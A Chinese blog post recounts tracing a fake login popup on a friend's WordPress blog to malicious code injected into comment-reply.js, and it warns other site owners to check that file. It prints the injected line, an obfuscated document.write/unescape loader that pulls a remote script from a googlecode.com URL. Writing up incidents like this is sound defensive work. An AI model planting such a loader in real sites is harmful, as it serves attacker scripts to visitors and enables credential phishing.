插入 comment-reply.js 的恶意 js 代码

今天有个朋友找我，说他的博客打开文章页就弹出如下图所示登陆框：点击取消就能打开文章页。

这很蛋疼，好好的博客被插，朋友也咨询了新网客服，得到答复就是“被插”，而且不是他一个人的博客被插，很多人都有类似情况。

既然朋友找我，那么就要帮忙一下了。我用 Firebug 查看，发现文章页被引用一个 js 文件，这个 js 文件如下图：

我查看了主题代码，没有发现引用此 js 文件的代码。然后我尝试把所有插件停止，问题依旧。

继续，因为 js 文件是被引用在 header 里，所以可以肯定是自动插入的，自动在 WordPress 的 header.php 引用 js 文件，那么肯定就是 wp_head() 函数。

于是我删了 wp_head()，那个弹窗就没了。说明我的判断没错，但是问题是哪里引用的呢？ functions.php 里面没有，插件全部停止了，那么下一步的判断就是 js 文件。我重新吧 wp_head() 函数放上，然后把主题里面引用的 js 都去掉了，问题依旧。再用 Firebug 查看，发现 comment-reply.js 被引用，除了它就是刚才上面第二张图片显示的 js，那么现在可以肯定问题出在 comment-reply.js，但 header.php 里面的 comment-reply.js 调用函数我屏蔽了啊？我再仔细看了一下 functions.php，原来我这个朋友的主题的 functions.php 里面也有一个 comment-reply.js 调用函数！Orz！

我用 ftp 然后用 notepad++ 打开 comment-reply.js 一看，嚯嚯，恶意代码原形毕露：

document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/javascript'%3E%3C/script%3E"));

厉害，竟然想到隐藏在这里！

好吧，说了这么多废话，就是说文章标题而已，主要是提醒朋友注意了，发现类似情况不用抓头了，直接看 /wp-includes/js/comment-reply.js 吧。

声明: 除非注明，ZWWoOoOo文章均为原创，转载请以链接形式标明本文地址
本文地址: http://zww.me/archives/25587